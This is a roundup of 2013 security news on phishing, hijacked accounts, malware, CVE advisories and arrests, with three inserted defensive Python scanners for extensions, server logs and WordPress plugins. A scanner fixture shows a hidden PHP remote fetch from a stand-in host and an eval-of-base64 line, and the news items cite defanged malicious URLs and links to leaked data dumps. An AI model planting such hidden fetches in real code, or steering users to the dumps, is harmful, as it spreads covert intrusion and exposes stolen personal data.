Today I came across a phishing page targeting PayPal users that, surprisingly, is hosted on a Chinese government website.
The PayPal phishing page is hosted at "hxxp://www.121.gov.cn/app/p/index.html" and shows a fake PayPal login page.
Once the victim enters his credentials and proceeds to log in, he is redirected to another page that asks for financial information, including name, address and credit card details.
Users are then asked to provide the 3-digit security code, password and security questions.
Once all the details have been entered, the victim is redirected to a page that says: "Your information has been sent successfully. For your security, you will be automatically logged out. Thank you for using PayPal". This page then redirects to the genuine PayPal login page.
A sub-domain of the Brazilian state of Minas Gerais government website, "hxxp://www.camaramontesanto.mg.gov.br", was found to host the same type of phishing page.
PhishTank records show that 121.gov.cn has hosted the phishing page since May 8 and camaramontesanto.mg.gov.br since May 23.
1. http://www.phishtank.com/phish_detail.php?phish_id=1827926
2. http://www.phishtank.com/phish_detail.php?phish_id=1857679
Here we go: Twitter has finally introduced the most anticipated security feature, "two-step authentication", which prevents hackers from getting access to your Twitter account.
The recent cyberattacks by the Syrian Electronic Army (SEA) forced Twitter to enable the two-step verification feature.
The SEA is the Syrian hacker group that recently hijacked high-profile Twitter accounts, including those of the Guardian, Telegraph, FT, AP and more, via social engineering attacks (phishing).
As I said once before, the only feature that can stop the Syrian Electronic Army is two-step verification:
I think 2-step authentication will prevent @official_sea12 from hacking ur Twitter account.@twitter can you make it fast?!!!!!! #EHN
— E Hacking News (@EHackerNews) May 5, 2013
Thank you, Twitter, for enabling this feature.
What exactly is two-step authentication?
Though I have already explained this in my previous articles, I would like to explain it once more here.
"Two-step authentication is a security feature that prompts you to enter a temporary password sent to your phone whenever you log into your account."
So how do you enable this security feature?
- Go to https://twitter.com/settings/account page
- Scroll to the bottom of the page, where you will find the "Account security" option.
- Select the option and follow the instructions.
Unknown cybercriminals compromised the official Facebook page of Miguel Ángel Mancera, the Head of Government of the Mexican Federal District.
After the hackers hijacked the page, officials immediately suspended the Facebook page to prevent misuse.
"Please note that the account of #Facebook's #JefeDeGob @manceramiguelmx has been hacked," reads the message posted by @GobiernoDF (translated).
"We have suspended the Facebook page to detect the causes of the inadequate functioning. Thanks for your understanding," reads the tweet posted by @ManceraConecta (translated).
"The only person who knows how to secure your system is the person who knows how to break it - Hacker." BreakTheSec.
A Romanian cybercriminal, six months into a five-year sentence for supplying gadgets that conceal ATM skimmers, has invented a new device that prevents ATM theft, Reuters reported.
Valentin Boanta, 33, who was arrested in 2009, said his arrest made him happy because it helped him get over his black-hat hacking addiction.
"Crime was like a drug for me. After I was caught, I was happy I escaped from this adrenaline addiction," Reuters quoted Boanta as saying. "So that the other part, in which I started to develop security solutions, started to emerge."
Secure Revolving System (SRS): the SRS device, funded by a technology firm called MB Telecom, can be installed in any existing ATM and prevents skimming devices from operating.
The hacker with the Twitter handle Ag3nt47, who has hit top university websites, has breached the Russian websites of Suzuki and Mazda.
The hacker tweeted links to the dumps. The database dumped (pastebin.com/u01PitxP) from the Russian website of the Japanese automobile manufacturer Suzuki includes password hashes and email addresses.
The data (pastebin.com/9hrwnmgC) taken from the Russian website of the Japanese automobile manufacturer Mazda contains nothing of interest.
Ag3nt47 gave no specific reason for the attack. It appears the hacker targets high-profile websites at random.
This is another incident that shows why you should be careful on the Internet. A British woman fell prey to a phishing scam and lost her £1 million life savings.
The victim unwittingly handed over her personal details to fraudsters after receiving a bogus bank notification email.
Tamer Abdelhamid, the fraudster who stole the personal data, then sold the information to a Nigerian national, Rilwan Oshodi. A 26-year-old woman from Sierra Leone used the data to change the bank details by impersonating the victim.
Detectives seized Oshodi's computer, which held details of more than 11,000 credit cards, during a raid on his home, according to the Daily Mail report.
The fraudsters bought cheeseburgers, high-end computers and gold with the stolen money. They are facing jail for their roles in the scam.
Security researchers from Microsoft warn users of a new Trojan, disguised as a Mozilla Firefox add-on and a Chrome extension, that can hijack your Facebook profile.
The threat was first discovered in Brazil; Microsoft detects it as "Trojan:JS/Febipos.A".
The Trojan checks whether the user is logged in to Facebook. It then attempts to download a configuration file that includes a list of commands.
According to the Malware Protection Center report, the malware is capable of doing the following with your Facebook account: like a page, share, post, join a group, invite friends to a group, chat with friends, and comment on a post.
"There may be more to this threat because it can change its messages, URLs, Facebook pages and other activity at any time," Microsoft concluded. "In any case, we recommend you always keep your security products updated with the latest definitions to help avoid infection."
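The shape Microsoft describes, an add-on that runs on facebook.com and can pull its command list from somewhere else, is visible in an extension's manifest before any of it runs. The script below is an added example (not Microsoft's analysis code) that audits Chrome extension manifests for that combination; the two manifests embedded in it are constructed for the example, and the hostnames and the `SOCIAL_HOSTS` list are assumptions, not values from the Trojan.

```python
"""Audit browser-extension manifests for the shape the Febipos write-up describes:
an add-on that gets a content script or host permission on facebook.com and can
also talk to an outside host (from which a config/command list could be fetched).
Added example, not Microsoft's analysis code; the two manifests below are
constructed for the example and are not the Trojan's real files."""
import json

SOCIAL_HOSTS = ("facebook.com",)   # assumption: the sites we care about here


def host_of_match_pattern(pattern):
    """Host part of a Chrome match pattern ('*://*.facebook.com/*' -> '*.facebook.com').
    Returns '*' for '<all_urls>' and None for non-URL permissions such as 'tabs'."""
    if pattern == "<all_urls>":
        return "*"
    _, sep, rest = pattern.partition("://")
    if not sep:
        return None
    return rest.split("/", 1)[0].lower()


def targets_social(host):
    """True if a pattern host covers one of SOCIAL_HOSTS ('*' covers everything)."""
    if host is None:
        return False
    if host == "*":
        return True
    bare = host.lstrip("*.")            # '*.facebook.com' -> 'facebook.com'
    return any(bare == s or bare.endswith("." + s) for s in SOCIAL_HOSTS)


def audit_manifest(manifest):
    """Return a list of human-readable findings for one parsed manifest.json."""
    findings = []
    host_perms = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    script_hosts = {host_of_match_pattern(m)
                    for cs in manifest.get("content_scripts", [])
                    for m in cs.get("matches", [])}
    social = {h for h in script_hosts | {host_of_match_pattern(p) for p in host_perms}
              if targets_social(h)}
    if not social:
        return findings                  # no reach into the social site: nothing to report
    findings.append("runs on social-network pages: " + ", ".join(sorted(social)))
    remote = {h for h in (host_of_match_pattern(p) for p in host_perms)
              if h and not targets_social(h)}
    if remote:
        findings.append("may also contact outside hosts: " + ", ".join(sorted(remote)))
    # Manifest V2 lets an extension relax its CSP so scripts can be loaded from a
    # remote origin, i.e. the command list can be changed by the operator at any time.
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, str) and "script-src" in csp and "http" in csp:
        findings.append("CSP permits remote script-src: " + csp)
    return findings


def load_manifest(path):
    """Read an extension's manifest.json from disk (e.g. a Chrome profile's Extensions dir)."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


# Constructed samples (not real extensions).
SAMPLE_MANIFESTS = {
    "fancy_theme": {               # looks harmless, but shaped like the Trojan
        "manifest_version": 2,
        "name": "Fancy Theme",
        "permissions": ["tabs", "*://*.facebook.com/*", "http://cmd.example.invalid/*"],
        "content_scripts": [{"matches": ["*://*.facebook.com/*"], "js": ["inject.js"]}],
        "content_security_policy": "script-src 'self' http://cmd.example.invalid; object-src 'self'",
    },
    "json_viewer": {               # benign: never touches the social site
        "manifest_version": 2,
        "name": "JSON Viewer",
        "permissions": ["storage"],
        "content_scripts": [{"matches": ["*://*.example.org/*"], "js": ["view.js"]}],
    },
}


def audit_all(manifests=SAMPLE_MANIFESTS):
    """Map extension name -> findings, keeping only extensions with findings."""
    report = {name: audit_manifest(m) for name, m in manifests.items()}
    return {name: f for name, f in report.items() if f}


if __name__ == "__main__":
    for name, findings in audit_all().items():
        print(name)
        for f in findings:
            print("  -", f)
```

Point `load_manifest` at each `manifest.json` under a browser profile's extensions directory and feed the results to `audit_all`; an extension that runs on Facebook and also has permission for an unrelated host, or relaxes its CSP to load scripts over HTTP, deserves a closer look even if its store listing is a theme or font tool.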
Security researchers from Webroot have come across a few font-installing apps hosted on Google Play that install Android spyware called "iKno".
The apps look like legitimate font apps and let users install new fonts on their Android device.
The researchers analyzed the apps and identified malicious code that downloads and executes an ikno.apk file from a website.
iKno is Android spyware developed by Technoreap Solutions that monitors call logs, text messages and location.
It appears the malicious apps and the developer's account have been removed from Google Play.
A critical vulnerability (CVE-2013-3336) has been identified in Adobe ColdFusion, a commercial rapid web application development platform. The flaw allows attackers to remotely retrieve files stored on the server.
ColdFusion 10, 9.0.2, 9.0.1 and 9.0 and earlier versions for Windows, Macintosh and UNIX are affected.
Adobe's security advisory warns that the vulnerability is already being exploited in the wild.
The company is finalizing a fix for this bug and expects it to be available on May 14, 2013.
In the meantime, the company has offered a mitigation: users can protect themselves by restricting public access to the CFIDE/administrator, CFIDE/adminapi and CFIDE/gettingstarted directories.
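Whether that restriction is actually in place shows up in the web server's access log: any request to those three directories from outside the administrative network that gets a 200 back means the mitigation is not working. The script below is an added example, not part of Adobe's advisory; it parses combined-format log lines and flags such hits. The `ALLOWED_NETWORKS` ranges and the log lines are constructed for the example.

```python
"""Check a web server access log for hits on the ColdFusion admin directories that
Adobe's interim mitigation says should not be publicly reachable.  Added example,
not Adobe's guidance verbatim; the allowed networks and the log lines are
constructed for this example."""
import re
from ipaddress import ip_address, ip_network

# Directories named in Adobe's mitigation for CVE-2013-3336.
RESTRICTED_PREFIXES = ("/CFIDE/administrator", "/CFIDE/adminapi", "/CFIDE/gettingstarted")

# Assumption: only these (internal) networks should ever reach the admin paths.
ALLOWED_NETWORKS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Apache/nginx "combined" format: client, ident, user, [time], "request", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def is_restricted(path):
    """Case-insensitive prefix match; Windows hosts serve /cfide/ADMINISTRATOR too."""
    p = path.split("?", 1)[0].lower()
    return any(p.startswith(prefix.lower()) for prefix in RESTRICTED_PREFIXES)


def is_allowed_source(ip):
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ALLOWED_NETWORKS)


def find_admin_hits(lines):
    """(client, path, status) for every admin-directory request from outside ALLOWED_NETWORKS."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_restricted(m["path"]) and not is_allowed_source(m["ip"]):
            hits.append((m["ip"], m["path"], int(m["status"])))
    return hits


def unprotected_hits(lines):
    """Subset of find_admin_hits that the server actually answered (status < 400):
    a 403/404 means the restriction is working, a 200 means it is not."""
    return [h for h in find_admin_hits(lines) if h[2] < 400]


# Constructed log lines (RFC 5737 documentation addresses), not from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [09/May/2013:03:12:44 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 4121
10.1.2.3 - - [09/May/2013:03:13:01 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 9821
203.0.113.7 - - [09/May/2013:03:13:09 +0000] "GET /cfide/adminapi/administrator.cfc?method=login HTTP/1.1" 200 311
198.51.100.2 - - [09/May/2013:03:14:22 +0000] "GET /index.cfm HTTP/1.1" 200 2201
198.51.100.2 - - [09/May/2013:03:15:02 +0000] "GET /CFIDE/gettingstarted/ HTTP/1.1" 403 199
""".splitlines()


if __name__ == "__main__":
    for ip, path, status in find_admin_hits(SAMPLE_LOG):
        print(("EXPOSED " if status < 400 else "blocked ") + ip + " " + path + " " + str(status))
```

Run it over the real log with `find_admin_hits(open("access.log"))`. The case-insensitive match matters: ColdFusion on Windows answers `/cfide/adminapi/...` just as readily as the canonical spelling, so a restriction written for one casing only can be walked around.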
Last month, ESET analyzed a new sophisticated and stealthy Apache backdoor, "Linux/Cdorked.A", that drives traffic to malicious pages.
Security researchers at ESET observed more than 400 web servers infected with the backdoor, including 50 top-ranked websites.
In their latest report, ESET noted that Lighttpd and nginx web servers are also affected by this backdoor.
"We found it will not deliver malicious content if the victim's IP address is in a very long list of blacklisted IP ranges, nor if the victim's internet browser's language is set to Japanese, Finnish, Russian and Ukrainian, Kazakh or Belarusian," the report reads.
Researchers have still not been able to identify how this malicious software was deployed on the affected web servers.
The technical details are available at WeLiveSecurity.
A few days ago AlienVault Labs reported that the U.S. Department of Labor website was hacked and redirecting to a malware page. In their report, they said the exploit used in the attack was CVE-2012-4792.
After further analysis, security researchers discovered that the vulnerability exploited in the attack wasn't CVE-2012-4792 but a new zero-day affecting Internet Explorer 8.
The identifier CVE-2013-1347 has been assigned to this new IE vulnerability. Microsoft noted that Internet Explorer 6, IE7, IE9 and IE10 are not affected.
"The U.S. Department of Labor website wasn't the only entity affected, and we can confirm that at least 9 other websites were redirecting to the malicious server at the same time," AlienVault reports.
According to their report, the attack targeted websites belonging to several non-profit groups and institutes as well as a big European company in the aerospace, defence and security markets.
Invincea's founder Anup Ghosh told NextGov that the "target of the attack are [Energy Department] folks in a watering hole style attack compromising one federal department to attack another".
Facebook has updated the feature that lets users recover a hacked account with the help of three Facebook friends. Previously, Facebook sent secret codes to three Facebook friends you chose; using those codes, you could retrieve your account.
But this feature was abused by black-hat hackers to compromise victims' accounts by befriending them from three different profiles.
To overcome this problem, Facebook introduced a new feature called "Trusted Contacts" that lets users select 3 to 5 friends to receive the secret codes needed to recover the account.
"It's sort of similar to giving a house key to your friends when you go on vacation--pick the friends you most trust in case you need their help." Facebook security update reads.
Simple steps to add trusted contacts to your account:
- Go to your Security Settings
- Click on the Trusted Contacts section
- Click Choose Trusted Contacts
- Choose 3-5 friends and confirm your choices
However, there are a few risks in using this feature. If your friends decide to have fun at your expense, they are able to access your Facebook account.
I don't know why Facebook is not providing two-step authentication like Google does.
On May 2, Canonical released a security advisory fixing ten Linux kernel vulnerabilities that affect Ubuntu 12.10.
The vulnerabilities are:
- Information leak in the Linux kernel's UDF file system implementation (CVE-2012-6548)
- Information leak in the Linux kernel's ISO9660 CD-ROM file system driver (CVE-2012-6549)
- Integer overflow in the Direct Rendering Manager (DRM) subsystem for the i915 video driver (CVE-2013-0913)
- Denial of service flaw in guest OS time updates in the Linux kernel's KVM (CVE-2013-1796)
- Use-after-free error in guest OS time updates in the Linux kernel's KVM (CVE-2013-1797)
- Flaw in the way KVM emulated the IOAPIC (CVE-2013-1798)
- Privilege escalation vulnerability in the Linux kernel's ext3 filesystem (CVE-2013-1848)
- Buffer overflow in the Linux kernel's USB subsystem for devices reporting the cdc-wdm class (CVE-2013-1860)
- Information leak in the Linux kernel's dcb netlink interface (CVE-2013-2634)
- Kernel stack information leak in the RTNETLINK component (CVE-2013-2635)
To patch these vulnerabilities, Ubuntu users are urged to update their systems to the following package version: linux-image-3.5.0-28-generic 3.5.0-28.48.
To update your system, follow these instructions: https://wiki.ubuntu.com/Security/Upgrades.
Site Exposure Matrices (sem.dol.gov), a sub-domain of the United States Department of Labor website, was found to be hacked and infected with malicious code.
Malware analysts at AlienVault Labs analyzed the page and found that one of its JavaScript files had been tampered with to load malicious external JavaScript code.
The external script is designed to collect the following information from the victim's computer: the Java, Microsoft Office, Adobe Reader and Flash versions running on the system.
The script also checks for the presence of the following antivirus products: Avira, BitDefender, McAfee, AVG, NOD32, Dr.Web, Microsoft Security Essentials, Sophos, Kaspersky and F-Secure.
The collected information is sent to a remote server, which then serves malicious code that attempts to exploit a use-after-free vulnerability in Internet Explorer (CVE-2012-4792).
According to the report, some of the techniques used in the attack resembled a previous exploit identified on a Thailand NGO website.
A recent report from Symantec shows that even cybercriminals have become fans of the Telugu actresses Kajal Agarwal and Samantha: they have started using these actresses' names in their phishing campaigns.
A few days after Symantec spotted a phishing campaign titled "Samantha & Kajal very hot song from Brindavanam Telugu movie", they spotted another phishing campaign that uses their names.
"The phishing site displayed a picture from a captivating musical number from the movie 'Saitan'," the Symantec report reads. "The phishing site was titled 'Samantha & Kajal Very Hot Song', but in fact these celebrities were not a part of this movie."
The phishing page asks visitors to log in to watch the video. Once a user enters login credentials, they are redirected to the legitimate movie website.
"If users fell victim to the phishing site by entering their login credentials, phishers would have successfully stolen their information for identity theft purposes," the researcher says.
If you are using the Social Media Widget plugin on your WordPress site, remove it immediately. Sucuri has discovered that the plugin is being used to inject spam into sites.
The Social Media Widget is a simple sidebar widget that lets users enter their social media profile URLs and other subscription options to show icons in the sidebar linking to those sites, which open in a separate browser window.
It is a popular plugin with more than 935,000 downloads, which means thousands of WordPress sites are affected.
According to Sucuri's malware report, the plugin has a hidden call to a malicious URL, "hxxp://i.aaur.net/i.php", which is used to inject "Pay Day Loan" spam into websites running the plugin.
The malicious code was added only in the latest version of the plugin, SMW 4.0. Users are advised to remove the plugin from their sites. The plugin has been removed from the WordPress plugin repository.
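A hidden call to an outside host is the kind of thing a quick source scan of a plugin directory can surface before the next update lands. The script below is an added example, not Sucuri's scanner: it flags PHP fetch calls whose literal URL points at an untrusted host, and lines that combine `eval()` with a decoder. The PHP embedded in it is constructed to look like a sidebar widget, uses a placeholder host instead of the real malicious domain, and the `TRUSTED_HOSTS` list is an assumption.

```python
"""Scan WordPress plugin PHP for code that pulls content from an outside host,
the pattern Sucuri found in Social Media Widget 4.0 (a hidden call to a remote
i.php that injected spam).  Added example, not Sucuri's scanner; the PHP below is
constructed to look like a widget plugin and uses a placeholder host instead of
the real malicious domain."""
import re

# PHP functions that fetch or execute remote content.
FETCH_FUNCS = ("file_get_contents", "curl_init", "curl_setopt", "wp_remote_get",
               "wp_remote_post", "wp_remote_request", "fopen", "include", "include_once",
               "require", "require_once")
CALL_RE = re.compile(r"\b(%s)\s*\(" % "|".join(map(re.escape, FETCH_FUNCS)))
URL_RE = re.compile(r"""https?://(?P<host>[A-Za-z0-9.-]+)[^\s'"]*""")
OBFUSCATION_RE = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(")

# Assumption: hosts a plugin may legitimately call (update checks, etc.).
TRUSTED_HOSTS = ("wordpress.org", "api.wordpress.org")


def is_trusted(host, trusted=TRUSTED_HOSTS):
    host = host.lower()
    return any(host == t or host.endswith("." + t) for t in trusted)


def find_remote_calls(php_source, trusted=TRUSTED_HOSTS):
    """Return (line_no, function, url) for every fetch call whose literal URL points
    at an untrusted host.  URLs assembled by concatenation across lines are not seen;
    a fetch call with no literal URL on its line is still worth a manual look."""
    findings = []
    for no, line in enumerate(php_source.splitlines(), 1):
        call = CALL_RE.search(line)
        if not call:
            continue
        for m in URL_RE.finditer(line):
            if not is_trusted(m["host"], trusted):
                findings.append((no, call.group(1), m.group(0)))
    return findings


def find_obfuscation(php_source):
    """Line numbers that combine eval() with a decoding function, the usual way a
    hidden payload is stored inside an otherwise ordinary plugin file."""
    hits = []
    for no, line in enumerate(php_source.splitlines(), 1):
        names = set(OBFUSCATION_RE.findall(line))
        if "eval" in names and len(names) > 1:
            hits.append(no)
    return hits


# Constructed sample shaped like a sidebar widget; not the real plugin's code.
SAMPLE_PLUGIN = r"""<?php
/* constructed sample, shaped like a sidebar widget; not the real plugin */
function smw_render_icons($urls) {
    foreach ($urls as $site => $url) {
        echo '<a href="' . esc_url($url) . '" target="_blank">' . $site . '</a>';
    }
}
function smw_check_update() {
    return wp_remote_get('https://api.wordpress.org/plugins/info/1.0/social-media-widget.json');
}
function smw_footer() {
    $content = file_get_contents('http://spam.example.invalid/i.php?u=' . urlencode($_SERVER['HTTP_HOST']));
    echo $content;
}
"""

# Constructed: the classic one-liner used to hide a payload in a plugin file.
SAMPLE_OBFUSCATED = "<?php\neval(base64_decode('ZWNobyAnaGknOw=='));\n"


if __name__ == "__main__":
    for no, func, url in find_remote_calls(SAMPLE_PLUGIN):
        print("line %d: %s() fetches %s" % (no, func, url))
    print("obfuscated lines:", find_obfuscation(SAMPLE_OBFUSCATED))
```

Run `find_remote_calls(open(path).read())` over every `.php` under `wp-content/plugins/`. The update check against api.wordpress.org is skipped because it is on the trusted list; the `file_get_contents` call to the outside host in the footer hook is what the widget's users would have wanted to see before activating version 4.0.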
WordPress.com, the blog hosting service, has announced that it has enabled a two-step authentication feature to keep your account secure.
Two-factor authentication is a security feature that prompts you to enter a temporary secret number sent to your phone whenever you log into your account.
How do you enable two-step authentication on WordPress.com?
To enable this feature, go to the new Security tab in your WordPress.com account settings and go through the setup wizard.
"We know your blog is important to you, and today we’re proud to announce Two Step Authentication: an optional new feature to help you keep your WordPress.com account secure." Wordpress.com blog post reads.

Trend Micro has uncovered a new piece of malware that appears to be using the note-taking service Evernote as its command and control (C&C) server.
The Trojan, dubbed VERNOT, can perform several backdoor commands such as downloading, executing and renaming files, and it harvests information about the affected system.
Here is the interesting part: the malware receives its instructions from Evernote accounts and, at the same time, stores the harvested information in Evernote accounts.
"Misusing legitimate services like Evernote is the perfect way to hide the bad guys' tracks and prevent efforts done by the security researchers," the researchers pointed out.
This is not the first time a popular legitimate service has been abused as a C&C server; in the past, Google Docs, Sendspace, Twitter and other services have been used by cybercriminals to send instructions to malware.
The websites of the Knight Center for Journalism in the Americas and the International Symposium for Online Journalism were hit by a massive cyber attack that left the sites down for the last two weeks.
"The malicious cyber-attack was enough to shut our websites down, but not enough to shut us up. We rapidly created WordPress blogs to continue our regular and unique report on Journalism in the Americas," said professor Rosental Alves, founder and director of the Knight Center for Journalism in the Americas at the University of Texas at Austin.
"We have no idea why someone would want to attack our sites," said professor Alves.
They noticed that the attack originated from computers located in Russia.
According to the Knight Center news report, the attack took place on March 11. The affected websites are now back online.
"We had to shut down the sites while the University of Texas IT department conducted its work to clean the sites and make sure to increase their security levels. We are happy to be back with our normal presence on the Web," said professor Alves.

Slovenian police performed 12 house searches and arrested five cybercriminals believed to be responsible for malware attacks that steal money from companies' bank accounts.
It all started last year when the Slovenian national Computer Emergency Response Team (SI-CERT) started receiving reports about malware attacks.
The victims received emails purporting to come from a local bank and the state tax authority, with a Trojan horse attached.
The malware installs a remote administration tool that steals the victim's e-banking credentials and sends them to the cybercriminals.
"With stolen credentials and in the case where the victim did not remove the smart card containing the bank-issued certificate from the reader after use, the doors to the company's bank accounts were left open to the criminal gang," SI-CERT's report reads.
The attackers cleverly timed their attacks to happen on Fridays or the day before national holidays, so that the companies wouldn't immediately notice the theft.
According to the report, the criminal group used 25 money mules to transfer around 2 million euros.